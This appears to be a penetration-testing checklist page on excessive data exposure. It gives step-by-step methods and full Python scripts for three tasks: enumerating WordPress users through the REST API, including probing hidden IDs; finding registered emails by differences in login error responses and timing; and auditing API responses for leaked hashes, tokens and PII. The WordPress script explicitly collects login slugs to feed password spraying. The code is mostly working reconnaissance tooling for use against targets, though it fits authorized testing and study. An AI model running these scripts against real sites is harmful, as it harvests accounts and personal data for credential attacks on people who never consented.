Excessive Data Exposure

Check List

Methodology

Black Box

WordPress User Enumeration via Public REST API

1. Check if the target is running WordPress (on a default install the REST index at https://target.com/wp-json/ answers with a JSON list of routes).

2. Send a direct GET request to the default WordPress REST API users endpoint:

https://target.com/wp-json/wp/v2/users

3. Alternative endpoints (in case the main one is blocked):

https://target.com/wp-json/wp/v2/users/?per_page=100
https://target.com/wp-json/wp/v2/users/1
https://target.com/index.php?rest_route=/wp/v2/users
https://target.com/wp-json/wp/v2/users/me

per_page is capped at 100 by WordPress, so add page=2, page=3, ... on larger sites. /users/me only answers for an authenticated session; unauthenticated it returns 401 (rest_not_logged_in), which confirms the API is reachable but lists nothing.

4. If the response returns a JSON array of user objects, the vulnerability is confirmed. In the public (view) context WordPress returns these fields:

id, name, url, description, link, slug, avatar_urls

slug is a sanitized copy of the login name (user_nicename), so it is the field that feeds straight into password spraying. username, login and nickname only appear in the edit context, i.e. for an authenticated caller with the right capability; if they show up in an unauthenticated response, a plugin or theme is exposing extra data.

5. Enumerate user IDs sequentially:

https://target.com/wp-json/wp/v2/users/1
https://target.com/wp-json/wp/v2/users/2
...
https://target.com/wp-json/wp/v2/users/100

The collection endpoint only lists users who have published public posts. The per-ID endpoint still distinguishes the rest: 404 (rest_user_invalid_id) means the ID does not exist, while 401 (rest_user_cannot_view) means the user exists but is not publicly viewable.
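The steps above as one script, added here as an example (not code from the original page or from WordPress). The target URL is a placeholder taken from the command line, the PRIVATE_FIELDS list is an assumption about what should never appear unauthenticated, and the sample JSON used when no target is given is constructed so the parsing runs offline.

```python
"""WordPress user enumeration via /wp/v2/users (added example, not WordPress code)."""
import json
import sys
import urllib.error
import urllib.request

# Fields WordPress returns for a user in the public "view" context.
PUBLIC_FIELDS = ("id", "name", "url", "description", "link", "slug", "avatar_urls")
# Fields that should only be visible in the "edit" context (assumption: anything
# from this list in an unauthenticated response is a leak worth reporting).
PRIVATE_FIELDS = ("username", "login", "nickname", "email", "roles", "capabilities")


def fetch(base, path, timeout=10):
    """GET base+path and return (status, body); HTTP errors are returned, not raised."""
    req = urllib.request.Request(base.rstrip("/") + path,
                                 headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def parse_user_list(body):
    """Reduce a /wp/v2/users array to id, slug, display name and any private
    fields that leaked. The slug is a sanitized copy of the login name, so it is
    the value to feed into password spraying. Non-array bodies (hardening
    plugins often answer with an error object) yield an empty list."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []
    users = []
    for item in data:
        if not isinstance(item, dict) or "id" not in item:
            continue
        users.append({
            "id": item["id"],
            "slug": item.get("slug", ""),
            "name": item.get("name", ""),
            "leaked": sorted(k for k in PRIVATE_FIELDS if k in item),
        })
    return users


def classify_probe(status, body):
    """Interpret GET /wp/v2/users/{id} for a single ID.

    WordPress answers 200 for a listed user, 404 rest_user_invalid_id when the
    ID does not exist, and 401 rest_user_cannot_view when the user exists but
    is not publicly viewable. Anything else is treated as blocked."""
    try:
        code = json.loads(body).get("code", "")
    except (ValueError, AttributeError):
        code = ""
    if status == 200:
        return "listed"
    if status == 404 and code == "rest_user_invalid_id":
        return "no_such_user"
    if status == 401 and code == "rest_user_cannot_view":
        return "exists_hidden"
    return "blocked"


def enumerate_wp_users(base, max_id=100):
    """Paginate the collection endpoint, then probe the remaining IDs one by one."""
    listed = {}
    page = 1
    while True:
        status, body = fetch(base, f"/wp-json/wp/v2/users?per_page=100&page={page}")
        users = parse_user_list(body) if status == 200 else []
        if not users:
            break
        for user in users:
            listed[user["id"]] = user
        page += 1
    hidden = []
    for uid in range(1, max_id + 1):
        if uid in listed:
            continue
        if classify_probe(*fetch(base, f"/wp-json/wp/v2/users/{uid}")) == "exists_hidden":
            hidden.append(uid)
    return listed, hidden


if __name__ == "__main__":
    if len(sys.argv) > 1:
        found, hidden_ids = enumerate_wp_users(sys.argv[1])
        for u in found.values():
            print(f"{u['id']:>4} {u['slug']:<20} {u['name']}  leaked={u['leaked']}")
        print("exist but hidden:", hidden_ids)
    else:
        # Constructed sample shaped like a default install's public response.
        sample = json.dumps([{"id": 1, "name": "Site Admin", "slug": "admin", "url": "",
                              "description": "", "link": "https://target.com/author/admin/"}])
        print(parse_user_list(sample))
```

Run it as `python3 wp_users.py https://target.com`; the hidden-ID probe is the part that survives when a site only exposes authors with published posts.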

Information Disclosure via Verbose Error Messages

1. Discover any authentication or ID-based endpoint. Common ones:

/api/login, /api/auth, /v1/sessions, /api/v2/users/{id}, /api/forgot-password, /api/check-email

2. Send a request with a completely fake/non-existent user/ID/email:

{"email": "this-user-definitely-does-not-exist-12345@target.com", "password": "anything"}

3. Capture the exact error message, status code and response time.

4. Now send the same request with a real-looking but still fake value (or an incremental ID):

{"email": "admin@target.com", "password": "wrong"}

5. Compare the two responses and look for any of these differences:

Fake user response      | Real user response                 | Meaning
"User does not exist"   | "Invalid password"                 | User exists → enumeration confirmed
"Invalid credentials"   | "Password is incorrect"            | Same: user exists
404 Not Found           | 401 Unauthorized or 403 Forbidden  | Same: user exists
"account_not_found"     | "wrong_password"                   | Same: user exists
Response time 80 ms     | Response time 350 ms               | Possible existence

Any difference counts, including error codes buried in the JSON body, extra fields, or a different Content-Length with an identical message. Timing gaps usually come from the server only computing a password hash when the account exists; repeat each request several times and compare medians before trusting them.

6. Build a small wordlist of probable emails and repeat step 4 for each:

admin@target.com
support@target.com
john.doe@target.com
jdoe@target.com
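The comparison in steps 2 to 6 as a script, added here as an example (not code from the original page). The login URL, the email/password JSON field names and the sink address are assumptions; the response pairs used in the test path are constructed so the classification runs offline.

```python
"""Differential login probe: response diff plus median timing (added example)."""
import json
import statistics
import time
import urllib.error
import urllib.request

# Assumption: an address that certainly does not exist on the target.
SINK_EMAIL = "this-user-definitely-does-not-exist-12345@target.com"


def login_probe(url, email, password="wrong-password", timeout=10):
    """POST one credential pair and return (status, body, elapsed_seconds)."""
    payload = json.dumps({"email": email, "password": password}).encode()
    req = urllib.request.Request(url, data=payload,
                                 headers={"Content-Type": "application/json"})
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, body = resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        status, body = err.code, err.read().decode("utf-8", "replace")
    return status, body, time.perf_counter() - start


def fingerprint(body):
    """Canonical form of a body so cosmetic noise does not count as a difference:
    JSON is re-serialised with sorted keys, anything else is whitespace-collapsed."""
    try:
        return json.dumps(json.loads(body), sort_keys=True)
    except ValueError:
        return " ".join(body.split())


def compare(baseline, candidate):
    """List how the candidate (e.g. admin@target.com) differs from the baseline
    (the sink address). Each entry is (what, baseline_value, candidate_value)."""
    diffs = []
    if baseline[0] != candidate[0]:
        diffs.append(("status", baseline[0], candidate[0]))
    if fingerprint(baseline[1]) != fingerprint(candidate[1]):
        diffs.append(("body", fingerprint(baseline[1]), fingerprint(candidate[1])))
    return diffs


def timing_verdict(baseline_times, candidate_times, factor=2.0):
    """True when the candidate's median latency is at least `factor` times the
    baseline's. Fewer than three samples per side is never enough to decide."""
    if len(baseline_times) < 3 or len(candidate_times) < 3:
        return False
    return statistics.median(candidate_times) >= factor * statistics.median(baseline_times)


def classify(baseline, candidate, baseline_times=(), candidate_times=()):
    """'exists' if status or body differs, 'timing' if only latency does, else 'same'."""
    if compare(baseline, candidate):
        return "exists"
    if timing_verdict(list(baseline_times), list(candidate_times)):
        return "timing"
    return "same"


def enumerate_emails(url, candidates, samples=5):
    """Full procedure: baseline the sink address, then classify each candidate."""
    base_runs = [login_probe(url, SINK_EMAIL) for _ in range(samples)]
    base = base_runs[0][:2]
    base_times = [r[2] for r in base_runs]
    results = {}
    for email in candidates:
        runs = [login_probe(url, email) for _ in range(samples)]
        results[email] = classify(base, runs[0][:2], base_times, [r[2] for r in runs])
    return results


if __name__ == "__main__":
    wordlist = ["admin@target.com", "support@target.com",
                "john.doe@target.com", "jdoe@target.com"]
    for email, verdict in enumerate_emails("https://target.com/api/login", wordlist).items():
        print(f"{verdict:<7} {email}")
```

A "timing" verdict on its own is a lead, not a finding: confirm it with more samples, or with a second endpoint such as /api/forgot-password, before reporting.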

Information Disclosure

1. Create a normal/low-privilege account on the target.

2. Find any API endpoint that returns data about yourself or your resources. Common ones:

GET /api/me
GET /api/v1/profile
GET /api/v2/user

3. Call the endpoint with your account and capture the full JSON response. Compare it with what the client actually renders: password hashes, API keys, session tokens, internal IDs, roles and PII that the UI never displays are excessive data exposure on their own, before touching anyone else's account.

4. Try the same endpoint with other users' identifiers (if possible):

GET /api/v3/accounts?name=admin
GET /api/v3/accounts?id=1

5. If the endpoint returns another user's data when given their username, email address or ID, the vulnerability is confirmed. This overlaps with broken object level authorization; the excessive data exposure finding is that the returned object carries far more fields than the feature needs, so every such record leaks them.
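An audit of captured responses for steps 3 to 5, added here as an example (not code from the original page). The UI allowlist and the sensitive-name pattern are assumptions to adjust per target, and the two JSON documents at the bottom are constructed to stand in for a captured /api/me response and a response for another user's identifier.

```python
"""Audit captured API responses for excessive data exposure (added example)."""
import json
import re

# Assumption: keys a profile page legitimately needs; everything else is over-fetching.
UI_ALLOWLIST = {"id", "name", "avatar", "bio"}

# Assumption: key names that should never leave the server inside a user object.
SENSITIVE = re.compile(
    r"(password|passwd|hash|salt|secret|token|api[_-]?key|ssn|dob|birth|"
    r"e-?mail|phone|address|iban|role|is_admin|internal)", re.I)


def flatten(obj, prefix=""):
    """Yield (dotted.path, value) for every leaf in a nested JSON document."""
    if isinstance(obj, dict):
        for key, value in obj.items():
            yield from flatten(value, f"{prefix}{key}.")
    elif isinstance(obj, list):
        for index, value in enumerate(obj):
            yield from flatten(value, f"{prefix}{index}.")
    else:
        yield prefix.rstrip("."), obj


def audit(body, allowlist=UI_ALLOWLIST):
    """Step 3: for one captured response return
    'extra'     = top-level keys the UI does not need, and
    'sensitive' = leaf paths whose name matches the dangerous pattern."""
    doc = json.loads(body)
    paths = dict(flatten(doc))
    top = doc if isinstance(doc, dict) else {}
    return {
        "extra": sorted(k for k in top if k not in allowlist),
        "sensitive": sorted(p for p in paths if SENSITIVE.search(p)),
    }


def compare_self_vs_other(self_body, other_body):
    """Steps 4 and 5: given the response for your own account and the same
    endpoint queried with another user's identifier, report whether a different
    user's record came back and which of its fields leak. The other record only
    counts when it carries an id that differs from yours, so an error object
    such as {"error": "forbidden"} is not mistaken for a hit."""
    mine = dict(flatten(json.loads(self_body)))
    other = dict(flatten(json.loads(other_body)))
    returned = "id" in other and other["id"] != mine.get("id")
    return {
        "other_user_returned": returned,
        "other_leaks": audit(other_body)["sensitive"] if returned else [],
        "fields_only_in_other": sorted(set(other) - set(mine)),
    }


# Constructed samples: what a low-privilege /api/me might return, and what the
# same endpoint returned for ?id=1 (both invented for this example).
ME = json.dumps({"id": 7, "name": "Low Priv", "avatar": "/a/7.png",
                 "email": "low@target.com", "password_hash": "$2y$10$abc",
                 "roles": ["user"], "settings": {"api_token": "tok_123"}})
OTHER = json.dumps({"id": 1, "name": "admin", "email": "admin@target.com",
                    "password_hash": "$2y$10$xyz", "roles": ["admin"],
                    "ssn": "123-45-6789"})

if __name__ == "__main__":
    print("self :", audit(ME))
    print("other:", compare_self_vs_other(ME, OTHER))
```

In a real engagement paste the captured bodies in place of ME and OTHER; the "extra" list is the evidence for the over-fetching argument, and "other_leaks" is what goes into the impact section.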


White Box

Cheat Sheet
